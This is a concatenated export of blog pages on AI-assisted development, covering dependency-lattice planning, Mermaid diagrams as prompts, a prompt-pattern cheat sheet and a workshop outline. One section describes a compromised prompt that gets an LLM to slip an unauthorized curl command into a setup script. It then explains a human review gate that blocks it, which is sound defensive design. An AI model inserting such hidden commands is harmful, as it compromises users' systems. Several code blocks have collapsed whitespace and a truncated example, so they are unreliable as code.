│ emitter │ │ + error codes │
│ prereqs: T2 │ │ prereqs: T2 │
└─────┬───────┘ └────┬──────────┘
│ │
└───────┬────────┘
│
┌──────▼────────┐
│ T5: Integration│
│ test │
│ prereqs: T3,T4 │
└───────────────┘
Topological sort yields: T1 → T2 → {T3, T4} → T5
^^^^^^^^
parallel! Here's how you actually compute this. It's 20 lines of Python:
```
# Topological sort from a PLAN.md dependency graphfromcollectionsimportdefaultdict, dequedeftopo_sort(tasks):"""Given {task: [prerequisites]}, return execution order with parallel groups."""in_degree = {t: len(deps)fort, depsintasks.items()}
dependents = defaultdict(list)fort, depsintasks.items():fordindeps:
dependents[d].append(t)
queue = deque(tfort, deginin_degree.items()ifdeg == 0)
order = []whilequeue:# Everything in queue RIGHT NOW can run in parallelparallel_group = sorted(queue)
queue.clear()
order.append(parallel_group)fortinparallel_group:fordepindependents[t]:
in_degree[dep] -= 1ifin_degree[dep] == 0:
queue.append(dep)returnorder# csv2json PLAN.md as a dependency graphplan = {"T1_argparse": [],"T2_csv_reader": ["T1_argparse"],"T3_json_emitter": ["T2_csv_reader"],"T4_validators": ["T2_csv_reader"],"T5_integration": ["T3_json_emitter","T4_validators"],
}fori, groupinenumerate(topo_sort(plan)):
status ="(parallel)"iflen(group) > 1else""print(f" Step {i+1}: {', '.join(group)} {status}")# Output:
# Step 1: T1_argparse
# Step 2: T2_csv_reader
# Step 3: T3_json_emitter, T4_validators (parallel)
# Step 4: T5_integration
```
Core Insight The dependency graph determines the build order. You don't manually schedule tasks -- you declare prerequisites, and the algorithm handles sequencing and parallelism. The same principle that makes makereliable makes LDD reliable. And when you add a new task, the sort automatically recomputes -- you never manually reshuffle. Warning If your dependency graph has a cycle, topological sort fails. This is a feature, not a bug. A cycle means "A depends on B which depends on A" -- an impossible requirement. In a pipeline, you'd discover this at runtime when two tasks deadlock. In a lattice, you discover it when you try to compute the sort, before any work starts. If your PLAN has a cycle, your PLAN is wrong. Quiz You have 4 tasks. T1 has no prereqs. T2 depends on T1. T3 depends on T1. T4 depends on T2. What's the maximum parallelism? **2 tasks in parallel. **T1 runs first (only task with no prereqs). Then T2 and T3 can run simultaneously (both depend only on T1, which is done). Then T4 runs (depends on T2). The schedule is: T1 -> {T2, T3} -> T4. Three steps total, with step 2 using two parallel workers. If you had said "T1 -> T2 -> T3 -> T4" you'd be correct but slow -- the lattice reveals the parallelism that a linear schedule hides. This matters because it eliminates scheduling mistakes. If you forget that Task 4 depends on Task 3, you'll discover it when the topo sort puts them in the wrong order -- and the verification gate catches the broken input. The error surfaces at design time, not at runtime. Section 05
## No Execution Path Here's where LDD gets strange and powerful: the LLM never gets direct access to the shell. In a typical workflow, you write a prompt, the LLM generates a bash script, and you run it. If the prompt is malicious or compromised, the LLM can execute arbitrary code. Here's how that looks:
```
# Pipeline workflow: prompt -> code -> execute (no human gate)user_request ="Set up the project database"# LLM generates a setup scriptllm_output = llm(f"Write a bash script to: {user_request}")# What you expected:# createdb myproject && psql myproject file -> human review -> execute# LLM writes to OUTPUT/setup_db.sh (a FILE, not a command)# Human reads it, sees the curl line, deletes it.# Human runs the clean version manually.# The malicious payload never executed.# Even better: PLAN.md said "Task: create database"# Gate 4 checks: "Does setup_db.sh do only what PLAN says?"# Answer: No -- it has an unauthorized curl command.# Gate BLOCKS. Human investigates. Threat neutralized.
```
| Property || Shell Script Workflow || Lattice Workflow |
| **No escalation path ** || LLM → bash → system. Escalation is immediate. || LLM → file → human review → execution. Human is the escalation gate. |
| **Built-in audit trail ** || History is implicit. What ran? No clear record. || Every file, every gate, every execution is logged in EXECUTION.log. Full provenance. |
| **Blast radius ** || One bad script = system compromise. Radius = unbounded. || One bad file = one human-reviewable decision. Radius = the scope of that one decision. |
| **Execution inversion ** || LLM decides what runs. Human trusts the LLM. || Human decides what runs. LLM proposes, human disposes. |
Warning Regex-based guardrails can't stop certain attack classes. The answer isn't better filters. It's separating declaration from execution. If the LLM can't execute, it can't cause harm. Read [guardrails-engineers.html ]()for the full argument. This is why I call it "no execution path." The LLM proposes, but it never executes. The human is always in the loop. Section 06
## Formal Foundations LDD isn't just engineering intuition. It maps onto three well-established formal frameworks. You don't need to know the math to use LDD, but understanding why it works helps you extend it. **Design by contract (Meyer, 1986). **Each spec file is a contract with preconditions, postconditions, and invariants. KNOWLEDGE defines invariants. SPEC defines pre/post conditions. PLAN satisfies the contract. This is not metaphorical -- it's the same structure Eiffel and Ada use for software correctness.
```
# Design by contract, applied to spec layers# KNOWLEDGE.md defines the INVARIANT:# "Row count in JSON == row count in CSV minus header"# SPEC.md defines the CONTRACT:# Precondition: input is valid UTF-8 CSV# Postcondition: output is valid JSON array# Invariant: len(json_array) == csv_rows - 1# PLAN.md SATISFIES the contract:# Task 2 ensures precondition (CSV reader validates UTF-8)# Task 3 ensures postcondition (JSON emitter writes valid array)# Task 5 ensures invariant (integration test checks row counts)# If any task violates the contract, its gate BLOCKS.# The contract is checkable because it's explicit.
```
**Partial order and lattice theory. **Dependency is a relation: A ≤ B means "A must complete before B." This induces a DAG. Topological sort finds a linear extension -- a valid execution sequence. The "lattice" name is precise: the spec layers form a bounded lattice where KNOWLEDGE is the top element (most constrained) and OUTPUT is the bottom (most concrete). Convergence funnel: each layer narrows the solution space
KNOWLEDGE ┌──────────────────────────────────────────┐
(all facts) │ All possible systems that could exist │
└─────────────────┬────────────────────────┘
│ Eliminates: wrong domains, false assumptions
▼
SPEC ┌────────────────────────────────┐
(contract) │ Systems satisfying constraints │
└────────────────┬───────────────┘
│ Eliminates: wrong interfaces, missing criteria
▼
PLAN ┌──────────────────────┐
(schedule) │ Buildable systems │
└──────────┬───────────┘
│ Eliminates: impossible schedules, circular deps
▼
OUTPUT ┌────────────┐
(artifact) │ This system │
└────────────┘ **Entropy reduction. **Each layer removes entropy (uncertainty) from the solution space. KNOWLEDGE starts with high entropy -- many systems could satisfy the domain facts. SPEC cuts it down. PLAN cuts further. OUTPUT is a single point in the space. This is why the order matters: you can't reduce entropy at the PLAN layer if SPEC hasn't reduced it first. Each gate verifies that entropy actually decreased -- that the layer is strictly more constrained than the one above it. Core Insight The spec isn't documentation. It's a constraint system that converges toward a unique solution. Each layer removes entropy from the solution space. Design by contract makes the constraints checkable. Topological sort makes the execution order automatic. The result is a proof, not a hope. Analogy Sculpting. KNOWLEDGE is the block of marble -- it defines what material you're working with. SPEC is the rough shape -- you've removed the obvious excess. PLAN is the detailed form -- every chisel stroke is planned. OUTPUT is the statue. You can't plan chisel strokes before you know the rough shape. You can't rough-shape before you know the marble. The lattice enforces this order, and the gates check that each cut actually removed material (reduced entropy) rather than adding it back. Section 07
## Getting Started You don't need to rewrite your entire workflow. Start with the next feature. Here's the exact sequence:
```
# Step 1: Create the foldermkdir -p spec/# Step 2: Write KNOWLEDGE.md (human only, 1 hour max)cat > spec/KNOWLEDGE.md<<'EOF'
# Domain Knowledge: [YOUR FEATURE]
## Constraints
- [What must be true? What are the hard limits?]
- [What formats, sizes, protocols are involved?]
## Prior Art
- [What exists already? What did you try before?]
- [What libraries/tools are relevant?]
## Invariants
- [What must ALWAYS be true, before and after execution?]
- [These become your integration tests.]
EOF# Step 3: Draft SPEC.md (LLM drafts, human verifies against KNOWLEDGE)# Prompt: "Given this KNOWLEDGE.md, write a SPEC with acceptance criteria"# Then run Gate 2: every KNOWLEDGE constraint maps to a SPEC criterion# Step 4: Draft PLAN.md (LLM drafts, human verifies against SPEC)# Prompt: "Given this SPEC.md, decompose into tasks with prerequisites"# Then run Gate 3: DAG is acyclic, every SPEC criterion has a task# Step 5: Execute PLAN (LLM generates, human reviews at each gate)# For each task in topo-sort order:# 1. LLM generates output# 2. Human runs Gate 4: does output match PLAN task?# 3. If gate passes, move to next task# 4. If gate fails, LLM regenerates (not the human fixing it)
```
Try It Pick your next feature. Before touching code, write the three files: KNOWLEDGE, SPEC, PLAN. Spend three hours. Then compare the result to how you usually build features. Two things will surprise you: (1) the spec will catch requirements gaps you'd normally find during testing, and (2) the LLM's code quality improves dramatically when it has a verified spec to work from instead of a vague prompt. Warning The most common failure mode: skipping KNOWLEDGE and jumping straight to SPEC. "I know the domain, I don't need to write it down." You do. KNOWLEDGE.md isn't for you today -- it's for the LLM that drafts SPEC, for the gate that verifies SPEC, and for you in three months when you've forgotten why you made that constraint. Write it down. One hour. That's it. No fancy tooling. No formal verification software. Just structure, gates, and honesty about what you know and what you don't. The result: fewer bugs, faster development, and -- most importantly -- sleep. You know what your system will do before it does it. The lattice holds the proof. Joey Lopez · 2026 · [jrlopez.dev ]()
[← jrlopez.dev ]()· [← diagrams as prompts ]()· [guardrails → ]()[.md ]()
---
# mermaid-prompts.md
# https://jrlopez.dev/p/mermaid-prompts.html
---
title: "Diagrams as Prompts"
description: "Mermaid diagrams as structured reasoning inputs."
author: "Joey Lopez"
date: "2026-02-10"
tags: ["methodology", "theory"]
atom_id: 14
source_html: "mermaid-prompts.html"
url: "https://jrlopez.dev/p/mermaid-prompts.html"
generated: true
---
[jrlopez.dev ]()[Why Diagrams ]()[Specs ]()[Architecture ]()[Dependencies ]()[Flow ]()[The Pattern ]()[Examples ]()
# Diagrams as Prompts Mermaid diagrams aren't documentation. They're a reasoning tool. Feed yourself a diagram before you delegate work to AI. Joey Lopez [Why Diagrams ]()[Patterns ]()[Real Examples ]()Section 01
## The Problem With Prose Handoffs Prose feels clear when you write it. You're inside your own mental model. But when you hand it to an AI—or a teammate—all of a sudden the ambiguity surfaces. Dependencies weren't explicit. The sequence was wrong. Edge cases were invisible. Here's a prose spec for a simple page build: "Build a page with a nav, hero section, and three cards.
The nav should be sticky and have links to each card.
The cards should appear below the hero.
Make sure everything is responsive." Sounds reasonable, right? But look at what you didn't specify:
- Does the nav need to be built before the cards?
- Can the cards be built in parallel, or do they depend on shared tokens?
- What if the hero depends on the nav's padding?
- Is responsive a constraint or a suggestion? Now look at the same task as a diagram:
```
graph TD
T[L0: Tokens] --> N[L1: Nav]
T --> H[L1: Hero]
T --> C[L1: Cards]
N --> S[L2: Structure]
H --> S
C --> S
S --> V[L3: Verify Responsive]
```
graph TD
T[L0: Tokens] --> N[L1: Nav]
T --> H[L1: Hero]
T --> C[L1: Cards]
N --> S[L2: Structure]
H --> S
C --> S
S --> V[L3: Verify Responsive] The diagram forces you to answer every question *before *you delegate. You see the dependencies. You see the layers. You see the build order. And when you give it to the AI, there's no ambiguity. Core Insight Prose hides structural ambiguity. A diagram forces you to resolve dependencies, sequence, and scope BEFORE the AI starts working. The diagram becomes the specification. Section 02
## Diagrams as Specs A mermaid flowchart replaces a multi-paragraph spec. It's terse, visual, and executable. The AI can read it. You can verify it. And it's version-controlable. Example: A spec-driven workflow for feature development. Mermaid Source
```
graph LR
K["📋 KNOWLEDGE.md"] --> S["📄 SPEC.md"]
S --> P["📋 PLAN.md"]
P --> O["⚙️ OUTPUT"]
O --> E["✅ EXECUTION"]
E -->|Iterate| S
```
graph LR
K["📋 KNOWLEDGE.md"] --> S["📄 SPEC.md"]
S --> P["📋 PLAN.md"]
P --> O["⚙️ OUTPUT"]
O --> E["✅ EXECUTION"]
E -->|Iterate| S This diagram tells you:
- Start with what you know (KNOWLEDGE.md)
- Turn that into a spec (SPEC.md)
- Turn the spec into a plan (PLAN.md)
- Execute the plan and verify output
- If output doesn't match spec, iterate on the spec, not the code Try It Take your next task. Before writing any prose, draw the flowchart first. Give ONLY the flowchart to the AI. No long instructions. Just the diagram. Section 03
## Architecture Handoffs When you need to coordinate multiple services or systems, a sequence diagram or architecture diagram replaces pages of documentation. Example: A three-service architecture with explicit message flow. Mermaid Source
```
sequenceDiagram
Client->>API: POST /task
API->>Queue: Enqueue task
Queue->>Worker: Process task
Worker->>Database: Save result
Database->>Queue: Ack
Queue->>API: Task complete
API->>Client: Return result
```
sequenceDiagram
Client->>API: POST /task
API->>Queue: Enqueue task
Queue->>Worker: Process task
Worker->>Database: Save result
Database->>Queue: Ack
Queue->>API: Task complete
API->>Client: Return result Now the AI—and any engineer reading this—knows:
- The exact message passing order
- Which services talk to which
- Where synchronous vs. async boundaries are
- What happens when a service fails Core Insight The diagram constrains the solution space. An AI given a sequence diagram can't invent new services or change the protocol. The diagram is the contract. Section 04
## Dependency Maps If you can't draw the dependency graph, you don't understand the build order. And if you don't understand the build order, you're gambling that the AI does. Example: A real build dependency graph. Mermaid Source
```
graph TD
CSS["CSS Tokens"] --> Nav["Nav Component"]
CSS --> Hero["Hero Component"]
CSS --> Card["Card Component"]
Nav --> Page["Page Layout"]
Hero --> Page
Card --> Page
Page --> Test["Integration Tests"]
JS["JavaScript"] --> Test
Test --> Build["Production Build"]
```
graph TD
CSS["CSS Tokens"] --> Nav["Nav Component"]
CSS --> Hero["Hero Component"]
CSS --> Card["Card Component"]
Nav --> Page["Page Layout"]
Hero --> Page
Card --> Page
Page --> Test["Integration Tests"]
JS["JavaScript"] --> Test
Test --> Build["Production Build"] This diagram answers:
- What can be built in parallel? (Nav, Hero, Card all depend only on CSS)
- What's the critical path? (CSS → Page → Test → Build)
- What breaks if I skip a step? (You'll see it immediately) Warning If you can't draw the dependency graph, you don't understand the build order. And if you don't understand the build order, you're hoping the AI does. That's not a strategy. Section 05
## Flow Analysis Mermaid flows work for user journeys, data flows, and state machines. They make invisible paths visible. Example: A visitor flow through a teaching site. Mermaid Source
```
graph TD
L["Landing Page"]
L --> B["Browse Items"]
B --> T1["Teaching Page"]
B --> P["Paper PDF"]
T1 --> T2["Other Teaching Pages"]
T1 --> L
P --> L
T2 --> L
```
graph TD
L["Landing Page"]
L --> B["Browse Items"]
B --> T1["Teaching Page"]
B --> P["Paper PDF"]
T1 --> T2["Other Teaching Pages"]
T1 --> L
P --> L
T2 --> L And a state machine for a task processor: Mermaid Source
```
stateDiagram-v2
[*] --> Idle
Idle --> Running: task_enqueued
Running --> Complete: success
Running --> Failed: error
Complete --> [*]
Failed --> Idle: retry
Failed --> [*]: max_retries
```
stateDiagram-v2
[*] --> Idle
Idle --> Running: task_enqueued
Running --> Complete: success
Running --> Failed: error
Complete --> [*]
Failed --> Idle: retry
Failed --> [*]: max_retries Flows expose edge cases you didn't think about. Where can the system get stuck? What transitions are missing? The diagram is the test suite. Section 06
## The Universal Pattern Every time you delegate work to an AI, follow this pattern:
- **Think. **Don't write prose. Draw a diagram.
- **Audit. **Does the diagram match your intent? Are there missing edges? Circular dependencies?
- **Delegate. **Give ONLY the diagram to the AI. No long instructions.
- **Verify. **Does the output match the diagram? If not, the AI either misread it or the diagram was wrong. This is the contract. The diagram is the spec. Prose is optional. Code is the execution. Core Insight The diagram is the contract between you and the AI. Prose is a suggestion. A diagram is a specification. It has no ambiguity. This pattern works for:
- Feature specs
- Build pipelines
- API contracts
- Data transformations
- System architecture
- User journeys Section 07
## Real Examples Here are three real diagrams I use in practice. Each one replaced pages of documentation.
### Example 1: Site Build Lattice This is a teaching site build. It shows layers of dependencies and which components can be built in parallel. Mermaid Source
```
graph TD
T["L0: Tokens"] --> N["L1: Nav"]
T --> H["L1: Hero"]
T --> C["L1: Cards"]
N --> S["L2: Structure"]
H --> S
C --> S
S --> V["L3: Verify"]
```
graph TD
T["L0: Tokens"] --> N["L1: Nav"]
T --> H["L1: Hero"]
T --> C["L1: Cards"]
N --> S["L2: Structure"]
H --> S
C --> S
S --> V["L3: Verify"] **Used for: **Handed this to an AI agent to build the site. The layers made the build order crystal clear. No ambiguity about what blocks what.
### Example 2: Spec-Driven Workflow This is the workflow I follow for every feature: Knowledge → Spec → Plan → Output → Execution. Mermaid Source
```
graph LR
K["KNOWLEDGE.md"] --> S["SPEC.md"]
S --> P["PLAN.md"]
P --> O["OUTPUT"]
O --> E["EXECUTION"]
```
graph LR
K["KNOWLEDGE.md"] --> S["SPEC.md"]
S --> P["PLAN.md"]
P --> O["OUTPUT"]
O --> E["EXECUTION"] **Used for: **Pinning this above my terminal. When I'm tempted to jump to code without writing a spec, I see it and stop. The diagram is the guardrail.
### Example 3: Visitor Flow This is a teaching site's user journey. It shows how visitors move through the content and where they can return to the landing page. Mermaid Source
```
graph TD
L["Landing"]
L --> B["Browse items"]
B --> T1["Teaching page"]
B --> P["Paper PDF"]
T1 --> T2["Other teaching"]
T1 --> L
P --> L
T2 --> L
```
graph TD
L["Landing"]
L --> B["Browse items"]
B --> T1["Teaching page"]
B --> P["Paper PDF"]
T1 --> T2["Other teaching"]
T1 --> L
P --> L
T2 --> L **Used for: **Shared with a designer. They could see exactly how users move through the site without reading a single paragraph of documentation. Joey Lopez · 2026 · [jrlopez.dev ]()
[← jrlopez.dev ]()· [← cheat sheet ]()· [lattice development → ]()[.md ]()
---
# prompt-cheatsheet.md
# https://jrlopez.dev/p/prompt-cheatsheet.html
---
title: "Prompts Are Programs"
description: "Composition cheat sheet. Load/Chain/Compose operators."
author: "Joey Lopez"
date: "2025-11-20"
tags: ["methodology", "prompting", "template", "reference"]
atom_id: 13
source_html: "prompt-cheatsheet.html"
url: "https://jrlopez.dev/p/prompt-cheatsheet.html"
generated: true
---
[jrlopez.dev ]()[Formula ]()[Attention ]()[Density ]()[Operations ]()[Structure ]()[Patterns ]()[Persistence ]()[Reference ]()[Mistakes ]()
# Prompts Are Programs A composition cheat sheet. Attention positioning, token density, core operations, and every pattern with citations. Joey Lopez [Attention ]()[Operations ]()[Patterns ]()Section 01
## The Formula Every prompt you've ever written follows this structure. Template defines *how *to think. Context defines *what *to think about. Output is the novel result. Template (static) + Context (dynamic) = Output (novel)
↓ ↓ ↓
How to think What to think about Result for THIS context This isn't metaphorical. It's literal. The template is reusable—you can apply it to any context. The context is unique to this instance. The output is only possible because both exist together. Core Insight Every prompt you've ever written is an instance of this formula. Template + Context = Output. Reuse templates across contexts. Never mix them. Section 02
## Where Attention Falls Language models don't distribute attention equally. Transformer architectures have positional bias: top and bottom get more focus. Middle content—even if critical—gets statistically less attention. ┌─────────────────────────────────┐
│ TOP: Critical instructions │ ← HIGH attention (primacy)
│ - Role, constraints, "never X" │
├─────────────────────────────────┤
│ MIDDLE: Reference material │ ← LOWER attention
│ - Code, data, examples │
├─────────────────────────────────┤
│ BOTTOM: Task + output format │ ← HIGH attention (recency)
│ - Specific ask, reminders │
└─────────────────────────────────┘ **Sandwich technique: **Put critical constraints at TOP and BOTTOM. Never bury your most important instruction in the middle, no matter how well you explain it. Warning If your critical instruction is in the middle, the model is statistically less likely to follow it. This isn't a design choice—it's an artifact of positional encoding in transformers. **Citation: **Liu et al. (2023) *Lost in the Middle: How Language Models Use Long Contexts *arXiv:2307.03172 Section 03
## Token Density Whitespace, prose, and formatting all cost tokens. The same idea expressed densely uses 3-5x fewer tokens. Denser tokens = more context available for the model to use.
| Format || Density || Best For |
| Pseudocode || Highest || Technical specs |
| Collapsed JSON || Very High || Tabular data to LLM |
| XML || High || Structured instructions |
| YAML || Medium || Human-readable config |
| Prose || Low || Explanations |
| Formatted JSON || Lower || Pretty-printed output |
**Example: **Dense (15 tokens)
```
def get_user(id: int) -> User:
"""Cache 5min, raise NotFound"""
```
Sparse (45 tokens)
```
The get_user function accepts an integer ID parameter
and returns a User object. Results are cached for 5
minutes. Raises NotFound if the user doesn't exist.
```
Try It Take your last prompt. Rewrite the specification section as pseudocode instead of prose. Count how many tokens you save. Share the ratio with a colleague. Section 04
## Load, Chain, Compose There are only three things you can do with a prompt. Everything else is a combination of these three operations.
### 1. Load Bring artifacts into context—files, git status, command output, external data.
```
!`git status --short`
```
### 2. Chain Output of step A becomes input to step B. Preserve state across steps.
```
Step 1: Analyze requirements → requirements.md
Step 2: Load requirements.md → Generate plan → plan.md
Step 3: Load plan.md → Implement with full context
```
### 3. Compose Combine a template with context to produce a specialized output.
```
Template: "Review code for $CRITERIA"
Context: CRITERIA=security, FILE=auth.py
Output: Security review of auth.py
```
Core Insight These are the only three things you can do with a prompt. Everything else—chaining, few-shot, meta-prompting—is a combination of Load, Chain, and Compose. Section 05
## XML Structure XML tags create clear boundaries between objective, context, requirements, constraints, output, and verification. The model respects structured boundaries more reliably than prose.
### 6-Tag Pattern
```
What and whyBackground, files to loadSpecific instructionsWhat to avoid and WHYHow to confirm success
```
### Tag Selection by Complexity
| Task Type || Include Tags |
| Simple || objective, output, verification |
| Complex || Add context, constraints |
| Pattern demo || Add examples, before/after |
| Security risk || Add security_checklist |
### Full Template
```
Refactor the authentication module to use industry-standard bcrypt
instead of custom hashing, improving security and maintainability.
custom_sha256 with salt rotation every 30 days
1. Replace custom hash with bcrypt
2. Maintain backward compatibility for existing hashes
3. All existing tests must pass
4. New tests for bcrypt edge cases
- No new external dependencies (bcrypt must already be in requirements)
- Cost factor must be ≥12
- Never log passwords, hashes, or salt
- Migration path for existing users
All tests pass, including new bcrypt tests.
Manual check: old hashes still verify, new hashes use bcrypt.
No new secrets in logs.
```
Section 06
## The Pattern Catalog These are the patterns that work. Not because they're trendy—because they're grounded in how transformers process language.
### Foundational Patterns
| Pattern || Template || When |
| **Persona ** || "You are an expert [role] with [skills]..." || Every prompt. Anchors behavior. |
| **Few-Shot ** || 2-3 input → output examples || Complex output format or rare patterns. |
| **Template ** || "Respond in this format: [structure]" || When output structure is critical. |
| **Chain-of-Thought ** || "Think step by step before answering" || Multi-step reasoning, math, logic. |
### Advanced Patterns
#### ReAct (Reasoning + Action)
```
THINK: What should I do?
ACT: Do specific action
OBSERVE: Check result
→ Repeat until done
```
**Citation: **Yao et al. (2022) *ReAct: Synergizing Reasoning and Acting in Language Models *arXiv:2210.03629
#### Tree of Thoughts
```
1. Generate 3 approaches
2. Evaluate pros/cons each
3. Choose best, execute
```
**Citation: **Yao et al. (2023) *Tree of Thoughts: Deliberate Problem Solving with Large Language Models *arXiv:2305.10601
#### Meta-Prompting Use AI to generate prompts for other AI to execute. Separates analysis from execution—one model does clarification, another does the work with fresh context.
```
You (vague idea) → AI #1 (generates detailed prompt) → AI #2 (executes with full attention)
```
**Why it works: **AI #1 asks clarifying questions, adds structure, defines success criteria. AI #2 gets clean, specific instructions with full attention. No context wasted on negotiation. Pattern Insight Persona + Few-Shot should be in every prompt. Use Chain-of-Thought for reasoning. Use ReAct for iteration. Use Meta-Prompting when one model can't hold both the goal and the execution strategy.
### Citations
- Wei et al. (2022) *Chain-of-Thought Prompting Elicits Reasoning in Large Language Models *arXiv:2201.11903
- White et al. (2023) *A Prompt Pattern Catalog to Enhance Prompt Engineering with ChatGPT *arXiv:2302.11382 Section 07
## Making Context Survive Context windows fill up. Conversations end. Projects span weeks. These three files are how you maintain coherence across boundaries.
### Spec Folder Pattern
```
spec/
├── KNOWLEDGE.md # WHY - Decisions, constraints, patterns
├── SPEC.md # WHAT - Requirements, acceptance criteria
└── PLAN.md # HOW - Phases, tasks, verification
```
### Surgical Loading Load based on what you're doing, not everything at once:
| Task || Load This || Why |
| Understanding constraints || KNOWLEDGE.md only || Focus on why, not what or how |
| Checking requirements || SPEC.md only || Verify acceptance criteria |
| Executing next step || PLAN.md only || Get unblocked, don't re-design |
| Planning a phase || SPEC.md + KNOWLEDGE.md || Requirements + constraints |
Warning Never load all three at once. It wastes context on irrelevant information. You're optimizing for attention—load only what this step needs.
### Context Handoff Template
```
What was requested at the start
Files created/modified, decisions made, blockers resolved
Specific next tasks with file paths
What failed and why - avoid repeating mistakes
Gotchas, assumptions, constraints discovered in the work
What's finalized vs still draft. Which files are safe to change.
```
Save this as HANDOFF.mdor CONTEXT.md. Load it at the start of your next session. Forward Link This folder structure isn't arbitrary. It's a dependency lattice. Knowledge informs Spec. Spec informs Plan. Plan refers back to both. This is Lattice-Driven Development. Section 08
## Quick Reference Bookmark this section. Use these tables every time you write a prompt.
### Attention Positioning
| Position || Put Here || Why |
| Top || Role, constraints, "never X" || Primacy bias |
| Middle || Code, data, examples || Reference material |
| Bottom || Task, output format, reminders || Recency bias |
### Core Operations
| Operation || What || Example |
| Load || Bring into context || |
| Chain || Output → Input || plan.md → implementation |
| Compose || Template + Context || "Review $FILE for $CRITERIA" |
### Token Optimization
| Do || Don't |
| Pseudocode || Verbose prose |
| Collapsed JSON || Formatted JSON |
| XML tags || Markdown headings |
| TOON for arrays || Nested JSON |
### Patterns to Use
| Pattern || When |
| Persona + Few-shot || Every prompt |
| Chain-of-Thought || Complex reasoning |
| ReAct || Multi-step with validation |
| Tree of Thoughts || Trade-off decisions |
| Meta-Prompting || AI generates prompts |
| Sandwich || Critical constraints |
### Persistence Files
| File || Contains |
| KNOWLEDGE.md || Why (decisions, constraints) |
| SPEC.md || What (requirements, criteria) |
| PLAN.md || How (tasks, phases) |
| CONTEXT.md || State (handoff, current progress) |
Section 09
## Common Mistakes These happen in almost every project. Learn to spot them early.
| Wrong || Right || Why |
| Load entire repo into prompt || Load only what this step needs || Wastes context, dilutes attention on relevant code |
| "Make it better" || "Refactor X to use Y pattern" || Vague instructions breed vague outputs |
| Analyze + fix in one prompt || Analyze → report → fresh context → fix || Separate concerns let model focus on one thing |
| Bury critical instruction in middle || Put at top AND bottom (sandwich) || Positional attention bias; recency + primacy |
| Prose for specs || Pseudocode or XML || Dense is better; whitespace costs tokens |
| Load KNOWLEDGE + SPEC + PLAN together || Surgical load: pick one or two per step || Irrelevant files waste context window |
Try It Pick your last 3 prompts. Check each against this table. Did you make any of these mistakes? Rewrite one to fix it. Share the before/after with a colleague. Joey Lopez · 2026 · [jrlopez.dev ]()
[← jrlopez.dev ]()· [← guardrails ]()· [foundational patterns → ]()[.md ]()
---
# prompt-engineering-bootcamp.md
# https://jrlopez.dev/p/prompt-engineering-bootcamp.html
---
title: "Prompt Engineering Bootcamp"
description: "90-minute hands-on workshop — systematic AI workflows, role-specific tracks, capstone skill build."
author: "Joey Lopez"
date: "2026-01-10"
tags: ["prompting", "teaching"]
atom_id: 24
source_html: "prompt-engineering-bootcamp.html"
url: "https://jrlopez.dev/p/prompt-engineering-bootcamp.html"
generated: true
---
[← home ]()[overview ]()[materials ]()[session flow ]()[what's new ]()
# Prompt Engineering Bootcamp From Patterns to Systems Joey Lopez · Sr. Data Engineer [overview ]()[materials ]()[session flow ]()[what's new ]()
## Overview A redesigned 90-minute hands-on workshop that teaches systematic AI workflows through three intuitions: **context is everything **, **structure gets rewarded **, and **you are the retrieval system **. Participants leave with installed tools and the ability to create more. 90 Minutes Live + 15 min prerequisite 4 Role-Specific Tracks Dev, PO/PM, Delivery, Tech Lead 5 Skills Included 4 role skills + 1 capstone 2026 Current Actively maintained
## Materials & Resources
### For Participants 📋
#### Common Knowledge 15-minute self-study. Complete before the live session to align on foundational concepts. [Participant Materials → ]()🎤
#### Session 1 — Patterns & Priority Builder 60 min. Three Approaches Framework, foundational patterns, and a hands-on priority builder exercise. [Session 1 → ]()🎯
#### Session 2 — Advanced Patterns & Interview Prep 60 min. ReAct, Tree of Thoughts, and a complete interview preparation workflow using spec-kit methodology. [Session 2 → ]()⚡
#### Quick Reference Cards Pattern recognition guide and decision tree for rapid lookup during practice. [Quick Reference → ]()
### Role-Specific Skills 👨💻
#### Developer Second Brain ReAct-driven code migrations, refactoring, feature implementation, and systematic debugging with annotated diffs. [Developer Skill → ]()📊
#### PO/PM Second Brain User stories with Given/When/Then criteria, sprint backlogs with capacity planning, roadmap prioritization, and exec reports. [PO/PM Skill → ]()📋
#### Delivery Lead Second Brain ABCD priority building, risk matrices, client status reports, and phased onboarding plans — all system-ready. [Delivery Lead Skill → ]()🏗️
#### Tech Lead Second Brain ADRs via Tree of Thoughts, metaprompts for team amplification, technical spike plans, and .cursorrules generation. [Tech Lead Skill → ]()🔨
#### Make Skills (Capstone) Turn any repeated weekly task into a structured skill file. 3-phase workflow: discover, extract pattern, generate. Every skill is a RAG system. [Make Skills → ]()
### For Facilitators 📚
#### Facilitator Guide v2 Minute-by-minute script, timing notes, failure modes, and contingency plans for delivery. [Facilitator Guide → ]()📖
#### Participant Materials Decision matrices, demo personas, spec-kit templates, and workshop completion checklist. [Participant Materials → ]()
## Session Flow 105 total minutes: 15 min prereq + 90 min live 15 min Prereq Self-study 15 min Activation Framing & context 40 min Role Fork Role-specific deep dive 20 min Capstone Build your own skill 10 min Reveal + Close Synthesis & next steps
## What's New in v2 Refined based on v1 success. Better structure, faster delivery, more agency.
| Dimension || v1 || v2 |
| **Duration ** || 2 hours || 90 min + 15 min prereq (105 min total) |
| **Structure ** || Single track || 4 role-specific tracks |
| **Focus ** || Pattern recognition || System building + pattern mastery |
| **Exercises ** || Generic examples || Role-aligned, production-relevant |
| **Takeaway ** || Understand patterns || Installed tools + ability to build more |
| **Capstone ** || None || Make Your Own Skills (20 min) |
| **Grounding ** || Academic || Grounded in real project outcomes |
### Key Improvements
- ✓ **Faster **: 90 min instead of 120 (still covers more)
- ✓ **More relevant **: Role-specific patterns, not one-size-fits-all
- ✓ **Agency **: Participants build their own skills in the capstone
- ✓ **Production-tested **: Methodology grounded in real project outcomes
- ✓ **Lower activation energy **: Prereq removes baseline friction Joey Lopez · 2026 · [jrlopez.dev ]()· [← home ]()· [guardrails → ]()[.md ]()
---
# prompting-advanced.md
# https://jrlopez.dev/p/prompting-advanced.html
---
title: "Prompt Patterns (Advanced)"
description: "ReAct, Tree of Thoughts, self-consistency, constitutional AI."
author: "Joey Lopez"
date: "2025-11-05"
tags: ["prompting", "reference", "teaching"]
atom_id: 5
source_html: "prompting-advanced.html"
url: "https://jrlopez.dev/p/prompting-advanced.html"
generated: true
---
[jrlopez.dev ]()[ReAct ]()[Tree of Thoughts ]()[Spec-Kit ]()[When to Use ]()[Reference ]()
# Advanced Prompting Patterns When foundational patterns aren't enough. Multi-step reasoning, decision frameworks, and orchestrated workflows. Joey Lopez [ReAct ]()[Tree of Thoughts ]()[Spec-Kit ]()Pattern 1
